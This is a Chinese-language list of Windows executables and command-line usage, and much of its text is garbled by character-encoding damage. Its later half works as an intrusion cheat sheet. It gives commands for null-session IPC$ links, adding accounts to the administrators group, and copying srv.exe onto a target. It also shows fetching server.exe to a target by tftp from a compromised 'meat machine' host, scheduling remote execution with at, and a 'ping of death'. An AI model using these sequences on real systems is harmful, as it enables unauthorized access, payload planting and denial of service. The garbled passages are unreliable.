regini.exe 用腳本修改注冊(cè)許可
regwiz.exe 注冊(cè)向?qū)?
replace.exe 用源目錄中的同名文件替換目標(biāo)目錄中的文件。
rexec.exe rexec 命令在執(zhí)行指定命令前，驗(yàn)證遠(yuǎn)程計(jì)算機(jī)上的用戶名，只有安裝了 TCP/IP 協(xié)議后才可以使用該命令。
risetup.exe 運(yùn)行遠(yuǎn)程安裝向?qū)Х?wù) (XP不可用)
route.exe 控制網(wǎng)絡(luò)路由表
rsh.exe 在運(yùn)行 RSH 服務(wù)的遠(yuǎn)程計(jì)算機(jī)上運(yùn)行命令
rsnotify.exe 遠(yuǎn)程存儲(chǔ)通知回顯
runas.exe 允許用戶用其他權(quán)限運(yùn)行指定的工具和程序
rundll32.exe 啟動(dòng)32位DLL程序
rwinsta.exe 重置會(huì)話子系統(tǒng)硬件和軟件到最初的值
Sndvol32 音量控制程序
sfc.exe 或CMD sfc.exe 回車 系統(tǒng)文件檢查器
services.msc 網(wǎng)絡(luò)連接服務(wù)
syskey 系統(tǒng)加密，(一旦加密就不能解開(kāi)，保護(hù)windows xp系統(tǒng)的雙重密碼wupdmgr WIDNOWS UPDATE)
SCANREG/RESTORE 命令恢復(fù)最近的注冊(cè)表
secedit.exe 自動(dòng)化安全性配置管理
services.exe 控制所有服務(wù)
sethc.exe 設(shè)置高對(duì)比
setver.exe 設(shè)置 MS-DOS 子系統(tǒng)向程序報(bào)告的 MS-DOS 版本號(hào)
sfc.exe 系統(tǒng)文件檢查
shadow.exe 監(jiān)控另外一臺(tái)中端服務(wù)器會(huì)話
shrpubw.exe 建立和共享文件夾
sigverif.exe 文件簽名驗(yàn)證
smlogsvc.exe 性能日志和警報(bào) (XP不可用)
sndrec32.exe 錄音機(jī)
sndvol32.exe 顯示聲音控制信息
snmp.exe 簡(jiǎn)單網(wǎng)絡(luò)管理協(xié)議 (XP不可用)
snmptrap.exe SNMP工具 (XP不可用)
srvmgr.exe 服務(wù)器管理器 (XP不可用)
subst.exe 將路徑與驅(qū)動(dòng)器盤符關(guān)聯(lián)
sysedit.exe 系統(tǒng)配置編輯器
syskey.exe NT賬號(hào)數(shù)據(jù)庫(kù)加密工具
sysocmgr.exe > Windows 安裝程序
systray.exe 在低權(quán)限運(yùn)行systray
taskmgr 任務(wù)管理器
tasklist /svc(CMD)了解每個(gè)SVCHOST進(jìn)程到底提供了多少系統(tǒng)服務(wù)(200098不可用)
tlist -S(CMD) 了解每個(gè)SVCHOST進(jìn)程到底提供了多少系統(tǒng)服務(wù)(
taskman.exe 任務(wù)管理器 (XP不可用)
taskmgr.exe 任務(wù)管理器
tcmsetup.exe 電話服務(wù)客戶安裝
tcpsvcs.exe TCP服務(wù)
termsrv.exe 終端服務(wù)
tftp.exe 將文件傳輸?shù)秸谶\(yùn)行 TFTP 服務(wù)的遠(yuǎn)程計(jì)算機(jī)或從正在運(yùn)行 TFTP 服務(wù)的遠(yuǎn)程計(jì)算機(jī)傳輸文件
themes.exe 桌面主題 (XP不可用)
tlntadmn.exe Administrator Telnet服務(wù)管理
tlntsess.exe 顯示目前的Telnet會(huì)話
tlntsvr.exe 開(kāi)始Telnet服務(wù)
tracert.exe 診斷實(shí)用程序?qū)煌鏁r(shí)間 (TTL) 值的 Internet 控制消息協(xié)議 (ICMP) 回顯數(shù)據(jù)包發(fā)送到目標(biāo)，以決定到達(dá)目標(biāo)采用的路由
tsadmin.exe Administrator 終端服務(wù)管理器 (XP不可用)
tscon.exe 粘貼用戶會(huì)話到終端對(duì)話
tsdiscon.exe 斷開(kāi)終端服務(wù)的用戶
tskill.exe 殺掉終端服務(wù)
tsprof.exe 用終端服務(wù)得出查詢結(jié)果
tsshutdn.exe 關(guān)閉系統(tǒng)
unlodctr.exe 性能監(jiān)視器的一部分
upg351db.exe 升級(jí)Jet數(shù)據(jù)庫(kù) (XP不可用)
ups.exe UPS service UPS服務(wù)
user.exe Windows核心服務(wù)
userinit.exe 打開(kāi)我的文檔
usrmgr.exe 域用戶管理器
utilman.exe 指定2000啟動(dòng)時(shí)自動(dòng)打開(kāi)那臺(tái)機(jī)器
vwipxspx.exe 調(diào)用IPX/SPX VDM
w32tm.exe 時(shí)間服務(wù)器
wextract.exe 解壓縮Windows文件
winchat.exe 打開(kāi)Windows聊天工具
winhlp32.exe 運(yùn)行幫助系統(tǒng)
winmsd.exe 查看系統(tǒng)信息
winver.exe 顯示W(wǎng)indows版本
wizmgr.exe Windows管理向?qū)?(XP不可用)
wjview.exe Java 命令行調(diào)用Java
write.exe 打開(kāi)寫字板
wscript.exe 腳本工具
wupdmgr.exe Windows update 運(yùn)行Windows update升級(jí)向?qū)?
winver 檢查Windows版本
Win98系統(tǒng)工具
開(kāi)始,運(yùn)行,輸入Msconfig 系統(tǒng)配置實(shí)用工具 配置啟動(dòng)選項(xiàng)，包括config.sys、autoexec.bat、win.ini、system.ini和注冊(cè)表及程序菜單中的啟動(dòng)項(xiàng)。并可設(shè)置是否故障啟動(dòng)。
開(kāi)始,運(yùn)行,輸入Regedit 注冊(cè)表修改工具 注冊(cè)表編輯器，如果沒(méi)有把握不要隨意修改注冊(cè)表！
開(kāi)始,運(yùn)行,輸入Regsvr32 dll注冊(cè)工具 當(dāng)提示找不到dll文件時(shí)，可用此來(lái)注冊(cè)該動(dòng)態(tài)連接庫(kù)。
開(kāi)始,運(yùn)行,輸入Regwiz 注冊(cè)向?qū)?用于注冊(cè)。校驗(yàn)系統(tǒng)文件，并可恢復(fù)系統(tǒng)文件。
如果啟動(dòng)時(shí)出現(xiàn)類似*.vxd文件錯(cuò)誤，可用此恢復(fù)該vxd文件。
開(kāi)始,運(yùn)行,輸入Scandskw 磁盤掃描程序,用于掃描修復(fù)磁盤。如果磁盤或文件出現(xiàn)錯(cuò)誤，可用來(lái)初步修復(fù)。
開(kāi)始,運(yùn)行,輸入DxDiag DirectX診斷工具可用于檢測(cè)DirectX運(yùn)行是否正常。
開(kāi)始,運(yùn)行,輸入NETSCAPE

ESC：清除當(dāng)前命令行；
F7：顯示命令歷史記錄，以圖形列表窗的形式給出所有曾經(jīng)輸入的命令，并可用上下箭頭鍵選擇再次執(zhí)行該命令。
F8：搜索命令的歷史記錄，循環(huán)顯示所有曾經(jīng)輸入的命令，直到按下回車鍵為止；
F9：按編號(hào)選擇命令，以圖形對(duì)話框方式要求您輸入命令所對(duì)應(yīng)的編號(hào)(從0開(kāi)始)，并將該命令顯示在屏幕上；
Ctrl+H：刪除光標(biāo)左邊的一個(gè)字符；
Ctrl+C Ctrl+Break，強(qiáng)行中止命令執(zhí)行；
Ctrl+M：表示回車確認(rèn)鍵；
Alt+F7：清除所有曾經(jīng)輸入的命令歷史記錄；
Alt+PrintScreen：截取屏幕上當(dāng)前命令窗里的內(nèi)容。
病毒破壞了系統(tǒng)文件，請(qǐng)使用殺毒軟件查殺病毒，然后利用Windows 2000提供的“命令控制臺(tái)”中的Chkdsk /r命令檢查修復(fù)系統(tǒng)文件即可
DOS命令字典..收藏

net use ipipc$ " " /user:" " 建立IPC空鏈接

net use ipipc$ "密碼" /user:"用戶名" 建立IPC非空鏈接

net use h: ipc$ "密碼" /user:"用戶名" 直接登陸后映射對(duì)方C：到本地為H:

net use h: ipc$ 登陸后映射對(duì)方C：到本地為H:

net use ipipc$ /del 刪除IPC鏈接

net use h: /del 刪除映射對(duì)方到本地的為H:的映射

net user 用戶名 密碼 /add 建立用戶

net user guest /active:yes 激活guest用戶

net user 查看有哪些用戶

net user 帳戶名 查看帳戶的屬性

net localgroup ***istrators 用戶名 /add 把“用戶”添加到管理員中使其具有管理員權(quán)限,注意：***istrator后加s用復(fù)數(shù)

net start 查看開(kāi)啟了哪些服務(wù)

net start 服務(wù)名 開(kāi)啟服務(wù)；(如:net start telnet， net start schedule)

net stop 服務(wù)名 停止某服務(wù)

net time 目標(biāo)ip 查看對(duì)方時(shí)間

net time 目標(biāo)ip /set 設(shè)置本地計(jì)算機(jī)時(shí)間與“目標(biāo)IP”主機(jī)的時(shí)間同步,加上參數(shù)/yes可取消確認(rèn)信息

net view 查看本地局域網(wǎng)內(nèi)開(kāi)啟了哪些共享

net view ip 查看對(duì)方局域網(wǎng)內(nèi)開(kāi)啟了哪些共享

net config 顯示系統(tǒng)網(wǎng)絡(luò)設(shè)置

net logoff 斷開(kāi)連接的共享

net pause 服務(wù)名 暫停某服務(wù)

net send ip "文本信息" 向?qū)Ψ桨l(fā)信息

net ver 局域網(wǎng)內(nèi)正在使用的網(wǎng)絡(luò)連接類型和信息

net share 查看本地開(kāi)啟的共享

net share ipc$ 開(kāi)啟ipc

net share ipc$ /del 刪除ipc

net share c$ /del 刪除C：共享

net user guest 12345 用guest用戶登陸后用將密碼改為12345

net password 密碼 更改系統(tǒng)登陸密碼

netstat -a 查看開(kāi)啟了哪些端口,常用netstat -an

netstat -n 查看端口的網(wǎng)絡(luò)連接情況，常用netstat -an

netstat -v 查看正在進(jìn)行的工作

netstat -p 協(xié)議名 例：netstat -p tcq/ip 查看某協(xié)議使用情況（查看tcp/ip協(xié)議使用情況）

netstat -s 查看正在使用的所有協(xié)議使用情況

nbtstat -A ip 對(duì)方136到139其中一個(gè)端口開(kāi)了的話，就可查看對(duì)方最近登陸的用戶名（03前的為用戶名）-注意：參數(shù)-A要大寫

tracert -參數(shù) ip(或計(jì)算機(jī)名) 跟蹤路由（數(shù)據(jù)包），參數(shù)：“-w數(shù)字”用于設(shè)置超時(shí)間隔。

ping ip(或域名) 向?qū)Ψ街鳈C(jī)發(fā)送默認(rèn)大小為32字節(jié)的數(shù)據(jù)，參數(shù)：“-l[空格]數(shù)據(jù)包大小”；“-n發(fā)送數(shù)據(jù)次數(shù)”；“-t”指一直ping。

ping -t -l 65550 ip 死亡之ping(發(fā)送大于64K的文件并一直ping就成了死亡之ping)

ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用參數(shù)“/all”顯示全部配置信息

tlist -t 以樹(shù)行列表顯示進(jìn)程(為系統(tǒng)的附加工具，默認(rèn)是沒(méi)有安裝的，在安裝目錄的Support/tools文件夾內(nèi))

kill -F 進(jìn)程名 加-F參數(shù)后強(qiáng)制結(jié)束某進(jìn)程(為系統(tǒng)的附加工具，默認(rèn)是沒(méi)有安裝的，在安裝目錄的Support/tools文件夾內(nèi))

del -F 文件名 加-F參數(shù)后就可刪除只讀文件,/AR、/AH、/AS、/AA分別表示刪除只讀、隱藏、系統(tǒng)、存檔文件，/A-R、/A-H、/A-S、/A-A表示刪除除只讀、隱藏、系統(tǒng)、存檔以外的文件。例如“DEL/AR *.*”表示刪除當(dāng)前目錄下所有只讀文件，“DEL/A-S *.*”表示刪除當(dāng)前目錄下除系統(tǒng)文件以外的所有文件

#2 二：

del /S /Q 目錄 或用：rmdir /s /Q 目錄 /S刪除目錄及目錄下的所有子目錄和文件。同時(shí)使用參數(shù)/Q 可取消刪除操作時(shí)的系統(tǒng)確認(rèn)就直接刪除。（二個(gè)命令作用相同）

move 盤符路徑要移動(dòng)的文件名 存放移動(dòng)文件的路徑移動(dòng)后文件名 移動(dòng)文件,用參數(shù)/y將取消確認(rèn)移動(dòng)目錄存在相同文件的提示就直接覆蓋

fc one.txt two.txt > 3st.txt 對(duì)比二個(gè)文件并把不同之處輸出到3st.txt文件中，"> "和"> >" 是重定向命令

at id號(hào) 開(kāi)啟已注冊(cè)的某個(gè)計(jì)劃任務(wù)

at /delete 停止所有計(jì)劃任務(wù)，用參數(shù)/yes則不需要確認(rèn)就直接停止

at id號(hào) /delete 停止某個(gè)已注冊(cè)的計(jì)劃任務(wù)

at 查看所有的計(jì)劃任務(wù)

at ip time 程序名(或一個(gè)命令) /r 在某時(shí)間運(yùn)行對(duì)方某程序并重新啟動(dòng)計(jì)算機(jī)

finger username @host 查看最近有哪些用戶登陸

telnet ip 端口 遠(yuǎn)和登陸服務(wù)器,默認(rèn)端口為23

open ip 連接到IP（屬telnet登陸后的命令）

telnet 在本機(jī)上直接鍵入telnet 將進(jìn)入本機(jī)的telnet

copy 路徑文件名1 路徑文件名2 /y 復(fù)制文件1到指定的目錄為文件2，用參數(shù)/y就同時(shí)取消確認(rèn)你要改寫一份現(xiàn)存目錄文件

copy c:srv.exe ip***$ 復(fù)制本地c:srv.exe到對(duì)方的***下

cppy 1st.jpg/b+2st.txt/a 3st.jpg 將2st.txt的內(nèi)容藏身到1st.jpg中生成3st.jpg新的文件，注：2st.txt文件頭要空三排，參數(shù)：/b指二進(jìn)制文件，/a指ASCLL格式文件

copy ip***$s.exe c: 或:copyip***$*.* 復(fù)制對(duì)方***i.exe文件（所有文件）至本地C：

xcopy 要復(fù)制的文件或目錄樹(shù) 目標(biāo)地址目錄名 復(fù)制文件和目錄樹(shù)，用參數(shù)/Y將不提示覆蓋相同文件

tftp -i 自己IP(用肉機(jī)作跳板時(shí)這用肉機(jī)IP) get server.exe c:server.exe 登陸后，將“IP”的server.exe下載到目標(biāo)主機(jī)c:server.exe 參數(shù)：-i指以二進(jìn)制模式傳送，如傳送exe文件時(shí)用，如不加-i 則以ASCII模式（傳送文本文件模式）進(jìn)行傳送

tftp -i 對(duì)方IP put c:server.exe 登陸后，上傳本地c:server.exe至主機(jī)

ftp ip 端口 用于上傳文件至服務(wù)器或進(jìn)行文件操作，默認(rèn)端口為21。bin指用二進(jìn)制方式傳送（可執(zhí)行文件進(jìn)）；默認(rèn)為ASCII格式傳送(文本文件時(shí))

route print 顯示出IP路由，將主要顯示網(wǎng)絡(luò)地址Network addres，子網(wǎng)掩碼Netmask，網(wǎng)關(guān)地址Gateway addres，接口地址Interface

arp 查看和處理ARP緩存，ARP是名字解析的意思，負(fù)責(zé)把一個(gè)IP解析成一個(gè)物理性的MAC地址。arp -a將顯示出全部信息

start 程序名或命令 /max 或/min 新開(kāi)一個(gè)新窗口并最大化（最小化）運(yùn)行某程序或命令

mem 查看cpu使用情況

attrib 文件名(目錄名) 查看某文件（目錄）的屬性

attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存檔，只讀，系統(tǒng)，隱藏 屬性；用＋則是添加為某屬性

dir 查看文件，參數(shù)：/Q顯示文件及目錄屬系統(tǒng)哪個(gè)用戶，/T:C顯示文件創(chuàng)建時(shí)間，/T:A顯示文件上次被訪問(wèn)時(shí)間，/T:W上次被修改時(shí)間

date /t 、 time /t 使用此參數(shù)即“DATE/T”、“TIME/T”將只顯示當(dāng)前日期和時(shí)間，而不必輸入新日期和時(shí)間

set 指定環(huán)境變量名稱=要指派給變量的字符 設(shè)置環(huán)境變量

set 顯示當(dāng)前所有的環(huán)境變量